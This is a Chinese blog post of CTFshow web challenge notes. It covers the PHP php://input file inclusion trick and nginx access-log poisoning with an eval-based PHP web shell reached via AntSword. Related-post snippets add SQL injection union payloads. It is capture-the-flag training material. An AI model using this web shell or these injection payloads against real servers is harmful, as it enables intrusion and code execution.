ctfshow刷题笔记(web篇)

最新推荐文章于 2024-08-21 13:54:14 发布
最新推荐文章于 2024-08-21 13:54:14 发布
阅读量358 收藏
点赞数
分类专栏: CTF web 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gygert/article/details/114854289
版权
本文记录了作者在CTFshow平台刷Web安全题目时的心得,主要涉及PHP相关题目。在web3题目中,利用PHP伪协议和文件包含漏洞,通过发送POST请求并抓包,成功获取flag。而在web4题上,虽然初期方法无效,但通过查看默认目录日志,进行注入并使用蚁剑连接,最终也找到了flag。
摘要由CSDN通过智能技术生成

CTFshow web刷题笔记

感觉ctfshow的web比buu友好多了,buu前三题直接劝退

目录

PHP

web3

在这里插入图片描述
题目提示是php伪协议,然后文件含有漏洞
我们在后边加一句?url=php://input发送post请求然后抓个包
在这里插入图片描述
放包后显示了文件
在这里插入图片描述
然后直接cat文件即可
在这里插入图片描述
得到flag
在这里插入图片描述

web4

在这里插入图片描述
看起来和web3一样,但是web3的方法做不了
先到默认目录看一下日志

?url=/var/log/nginx/access.log

在这里插入图片描述
抓个包进行一下注入

<?php @eval($_POST['123']);?>#密码123

在这里插入图片描述
然后用蚁剑连接
在这里插入图片描述
成功找到flag
在这里插入图片描述

Gygert
关注
专栏目录
CTFSHOW WEB题目
qq_45655564的博客
08-09 2937
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
labuladong的算法秘籍+刷题笔记V2.0
09-17
《labuladong的算法秘籍+刷题笔记V2.0》是针对计算机程序员面试和技能提升的一份宝贵资源,特别关注于刷题、算法和数据结构的学习。这套资料包含两部分:《labuladong的刷题笔记V2.0(力扣版).pdf》和《labuladong的...
ctfshow刷题记录
missht0的博客
01-23 281
web2 1' union select 1,2,3# 注入点在2 1' union select 1,database(),3# web2 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# flag,user 1' union select 1,group_concat(column_name),3 from informatio
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
最新发布
qq_53058639的博客
08-21 1021
废话不多话开启你们的旅程吧 这个也是我这几天才看 一些见解和思路分享给你们希望你们在旅途中玩的开心,学的开心✌( •̀ ω •́ )y。
ctf.show刷题记录_web(1-10)
szgyunyun的博客
06-28 720
`https://ctf.show/ 2、web2 正常页面: 3个字段,返回来再看一下 获取字段值 flag: 3、web3 看题,属于代码审计文件操作漏洞 根据代码判断,最典型的远程文件包含漏洞 利用方式有两种:利用:在GET请求url参数里面传入 远程文件包含还有一种PHP输入输出流的利用方式,可以直接执行POST代码,这里我们仍然用上面这个代码测试,只要执行POST请求 pastdata: php常见命令执行函数 flag: 4、ctf.show_web4 页面和web3一样,
ctfshow
PUTAOAO的博客
08-12 211
crypto2_月自圆 已知m长为71 加密后长度为142 flag在m中第53位置则在密文中105的位置刚好是salt的位置 可以爆破salt和a f ⇒ 1c l ⇒ 29 a ⇒ 56 g ⇒ 66 from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(
谷歌高畅Leetcode刷题笔记.pdf
08-04
这本书名为《LeetCode101:和你一起你轻松刷题(C++)》的电子书,作者高畅ChangGao,旨在帮助有C++基础但缺乏刷题经验的读者。本文将详细阐述该电子书中提及的IT知识点,覆盖算法与数据结构两大板块,以及十五个...
LeetCode刷题笔记.rar
07-05
《LeetCode刷题笔记》是针对LeetCode这个在线编程挑战平台的个人学习心得与总结,主要涵盖数据结构和算法两大核心领域。LeetCode是一个全球知名的编程训练网站,它提供了丰富的编程题目,帮助开发者提升编程技能,...
谷歌大佬刷题笔记.zip
04-25
谷歌大佬刷题笔记
labuladong的刷题笔记V1.7(力扣版)
03-06
【labuladong的刷题笔记V1.7(力扣版)】是一份全面的算法练习资源,涵盖了从基础数据结构到复杂算法的各种题目,旨在提升编程者在职场和发展中的算法能力。以下是对其中涉及知识点的详细说明: 1. **基础数据结构**...
ctf.show
giaogiao123的博客
02-15 271
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
ctfshow Nodejs
weixin_63231007的博客
03-08 735
承接上文nodejs原型链漏洞刷题练习
ctfshow(刷题经历)
qq_62046696的博客
06-26 1676
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
CTFshow web1
羽的博客
02-26 6117
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
CTF show WEB14
羽的博客
02-18 2810
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
CTFshow DJBCTF MISC(大吉杯) WP
七月的博客
01-24 3461
只做了misc的菜鸡,来写写misc部分的writeup,狸神的FM到最后也看不懂,太了呜呜呜。 十八般兵器 hint1:JPHS hint2:用Notepad++打开试试? hint3:前十种兵器对应10进制,后八种对应8进制 根据hint1,先利用JPHS将18张图片均解密一下,密码为空,每张图片解密后的数据末尾都有一段数字,这幅图是删掉了部分空格,实际需要往下拉。 根据题目的武器顺序,前十张图片的数字组合起来十进制转十六进制。后八张图片的数字组合起来八进制转十六进制,asc转码一下得到flag
CTF show WEB5
羽的博客
02-15 2813
考察md5绕过,要求v1为为字母,v2为数字,并且v1与v2的md5值相同。 md5漏洞介绍: PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。 v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD5 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903...
ctfshow(卷王杯)
qq_62046696的博客
09-24 1558
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
labuladong的刷题笔记
09-12
"Labuladong"是一个著名的算法题解博主,他的刷题笔记非常受欢迎。他的笔记具有以下几个特点: 1. 思路清晰:Labuladong的刷题笔记总是能够很清晰地阐述解题思路。他善于将复杂的问题简化为易于理解的小问题,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值